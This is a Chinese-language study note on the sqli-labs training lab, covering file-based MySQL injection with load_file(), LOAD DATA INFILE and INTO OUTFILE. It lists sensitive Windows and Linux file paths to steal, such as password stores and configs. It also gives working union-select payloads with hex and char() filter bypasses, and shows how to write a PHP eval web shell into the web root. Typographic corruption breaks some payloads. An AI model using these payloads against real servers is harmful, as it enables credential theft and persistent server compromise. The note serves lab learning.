之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象
文件型注入
函数讲解
1. load_file()导出文件
-
简介
load_file(file_name): 读取文件并返回该文件的内容作为一个字符串。
-
使用条件
-
必须有权限读取并且文件必须完全可读
and (select count() from mysql.user)>0/ 如果结果返回正常,说明具有读写权限。
and (select count() from mysql.user)>0/ 返回错误,应该是管理员给数据库帐户降权 -
欲读取文件必须在服务器上
-
必须指定文件完整的路径
-
欲读取文件必须小于 max_allowed_packet
如果该文件不存在,或因为上面的任一原因而不能被读出,函数返回空。比较难满足的就是权限,在 windows 下,如果 NTFS 设置得当,是不能读取相关的文件的,当遇到只有 administrators 才能访问的文件,users 就别想 load_file 出来。
-
-
在实际的注入中,我们有两个难点需要解决
- 绝对物理路径
- 构造有效的畸形语句(报错爆出绝对路径)
在很多 PHP 程序中,当提交一个错误的 Query,如果 display_errors = on,程序就会暴露 WEB 目录的绝对路径,只要知道路径,那么对于一个可以注入的 PHP 程序来说,整个服务器的安全将受到严重的威胁。
-
MySQL注入load_file常用路径
WINDOWS下:
c:/boot.ini //查看系统版本 c:/windows/php.ini //php配置信息 c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码 c:/winnt/php.ini c:/winnt/my.ini c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码 c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码 c:\Program Files\Serv-U\ServUDaemon.ini c:\windows\system32\inetsrv\MetaBase.xml //查看IIS的虚拟主机配置 c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码 c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此 c:\Program Files\RhinoSoft.com\ServUDaemon.exe C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件 //存储了pcAnywhere的登陆密码 c:\Program Files\Apache Group\Apache\conf\httpd.conf 或C:\apache\conf\httpd.conf //查看WINDOWS系统apache文件 c:/Resin-3.0.14/conf/resin.conf //查看jsp开发的网站 resin //文件配置信息. c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf //查看linux系统配置的JSP虚拟主机 d:\APACHE\Apache2\conf\httpd.conf C:\Program Files\mysql\my.ini C:\mysql\data\mysql\user.MYD //存在MYSQL系统中的用户密码
LUNIX/UNIX 下:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件 /usr/local/apache2/conf/httpd.conf /usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置 /usr/local/app/php5/lib/php.ini //PHP相关设置 /etc/sysconfig/iptables //从中得到防火墙规则策略 /etc/httpd/conf/httpd.conf // apache配置文件 /etc/rsyncd.conf //同步程序配置文件 /etc/my.cnf //mysql的配置文件 /etc/redhat-release //系统版本 /etc/issue /etc/issue.net /usr/local/app/php5/lib/php.ini //PHP相关设置 /usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置 /etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf //查看linux APACHE虚拟主机配置文件 /usr/local/resin-3.0.22/conf/resin.conf //针对3.0.22的RESIN配置文件查看 /usr/local/resin-pro-3.0.22/conf/resin.conf //针对3.0.22的RESIN配置文件查看 /usr/local/app/apache2/conf/extra/httpd-vhosts.conf //APASHE虚拟主机查看 /etc/httpd/conf/httpd.conf或/usr/local/apche/conf /httpd.conf //查看linux APACHE虚拟主机配置文件 /usr/local/resin-3.0.22/conf/resin.conf //针对3.0.22的RESIN配置文件查看 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上 /usr/local/app/apache2/conf/extra/httpd-vhosts.conf //APASHE虚拟主机查看 /etc/sysconfig/iptables //查看防火墙策略 load_file(char(47)) //可以列出FreeBSD,Sunos系统根目录 replace(load_file(0×2F6574632F706173737764),0×3c,0×20) replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
-
示例
Select 1,2,3,4,5,6,7,hex(replace(load_file(char(99,58,92,119,105,110,100,111,119,115,92,114,101,112,97,105,114,92,115,97,109)))
Explain:利用 hex() 将文件内容导出来,尤其是 smb 文件时可以使用。
id=-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))
Explain:"char(99,58,47,98,111,111,116,46,105,110,105)"就是"c:/boot.ini"的ASCII 代码
id=-1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69)
Explain:“c:/boot.ini” 的 16 进制是 “0x633a2f626f6f742e696e69”
id=-1 union select 1,1,1,load_file(c:\\boot.ini)
Explain:路径里的 / 用 \ 代替
2. 文件导入到数据库
-
简介
LOAD DATA INFILE 语句用于高速地从一个文本文件中读取行,并装入一个表中。文件名称必须为一个文字字符串。
在注入过程中,我们往往需要一些特殊的文件,比如配置文件,密码文件等。当你具有数据库的权限时,可以将系统文件利用 load data infile 导入到数据库中。
函数具体介绍:对于参数介绍这里就不过多的赘述了,可以参考 mysql 的文档。(提醒:参考文档才是最佳的学习资料)
示例:load data infile ‘/tmp/t0.txt’ ignore into table t0 character set gbk fields terminated by '\t’lines terminated by ‘\n’
将 /tmp/t0.txt 导入到 t0 表中,character set gbk 是字符集设置为 gbk,fields terminated by 是每一项数据之间的分隔符,lines terminated by 是行的结尾符。
当错误代码是 2 的时候的时候,文件不存在,错误代码为 13 的时候是没有权限,可以考虑 /tmp 等文件夹。
TIPS:我们从 mysql5.7 的文档看到添加了 load xml 函数,是否依旧能够用来做注入还需要验证。
3. 导入到文件
-
简介
SELECT.....INTO OUTFILE 'file_name'
可以把被选择的行写入一个文件中。该文件被创建到服务器主机上,因此您必须拥有 FILE 权限,才能使用此语法。file_name 不能是一个已经存在的文件。
-
一般有两种利用形式
-
第一种直接将 select 内容导入到文件中
Select version() into outfile "c:\\phpnow\\htdocs\\test.php"
此处将 version() 替换成一句话,<?php @eval($_post["mima"])?> 也即
Select <?php @eval($_post["mima"])?> into outfile "c:\\phpnow\\htdocs\\test.php"
直接连接一句话就可以了,其实在select 内容中不仅仅是可以上传一句话的,也可以上传很多的内容。
-
第二种修改文件结尾
Select version() Into outfile "c:\\phpnow\\htdocs\\test.php" LINES TERMINATED BY 0x16 进制文件
解释:通常是用 ‘\r\n’ 结尾,此处我们修改为自己想要的任何文件。同时可以用FIELDSTERMINATED BY
16 进制可以为一句话或者其他任何的代码,可自行构造。在sqlmap 中os-shell 采取的就是这样的方式, sqlmap os shell 解析链接:http://www.cnblogs.com/lcamry/p/5505110.html
-
-
需要注意的
-
可能在文件路径当中要注意转义,这个要看具体的环境
-
上述我们提到了load_file(),但是当前台无法导出数据的时候,我们可以利用下面的语句
select load_file('c:\\wamp\\bin\\mysql\\mysql5.6.17\\my.ini')into outfile 'c:\\wamp\\www\\test.php'
可以利用该语句将服务器当中的内容导入到 web 服务器下的目录,这样就可以得到数据了。上述 my.ini 当中存在 password 项(不过默认被注释),当然会有很多的内容可以被导出来,这个要平时积累。
-
注入方法
-
测试
?id=-1’)) or 1=1–+
-
读文件
前提条件:
- 当前权限对该文件可读
- 文件在该服务器上
- 路径完整
- 文件大小小于 max_allowed_packet
- 当前数据库用户有 FILE 权限
- secure_file_priv的值为空,如果值为某目录,那么就只能对该目录的文件进行操作
测试 payload
正常导入: ?id=-1' union select 1,2,load_file('/etc/php5/apache2/php.ini')--+ 通过char()函数将ascii十进制形式转为字符形式,可绕过引号过滤: ?id=-1' union select 1,2,load_file(char(47,101,116,99,47,112,104...))--+ 十六进制形式导入: ?id=-1' union select 1,2,load_file(0x2f6574632f706870352f6170616...) 可用于 smb 协议: ?id=-1' union select 1,2,load_file('//etc/php5/apache2/php.ini')--+ 可用于 dns 隧道: ?id=-1' union select 1,2,load_file('\\\\etc\\php5\\apache2\\php.ini')--+
-
导出到文件
前提条件
- 目标目录要有可写权限
- 当前数据库用户要有FILE权限
- 目标文件不能已存在
- secure_file_priv的值为空
- 路径完整
- outfile后的文件路径不能用十六进制或配合char()来实现,只能用引号这种形式
写文件
?id=-1')) union select 1,2,3 into outfile ('/var/www/sqli-labs/less-7/uuu.txt')--+ ?id=-1')) union select 1,2,3 into dumpfile ('/var/www/sqli-labs/less-7/uuu.txt')--+ 可写成:正常形式,ascii码形式,十六进制形式,smb协议形式,dns隧道形式
我们可以直接将一句话木马导入进去
?id=1’))union select 1,2,’<?php @eval($\_post[?mima?])?>’ into outfile “/var/www/sqli-labs/less-7/test.php”–+
可以使用菜刀连接木马
Less - 07: GET - Dump into outfile - String
-
测试
?id=-1')) or 1=1--+
-
导出到文件
将查询结果导出到文件
?id=-1’)) union select 1,2,3 into outfile (’/var/www/sqli-labs/less-7/uuu.txt’)–+
我们可以直接将一句话木马导入进去
?id=1’))union select 1,2,’<?php @eval($\_post[?mima?])?>’ into outfile “/var/www/sqli-labs/less-7/test.php”–+
可以使用菜刀连接木马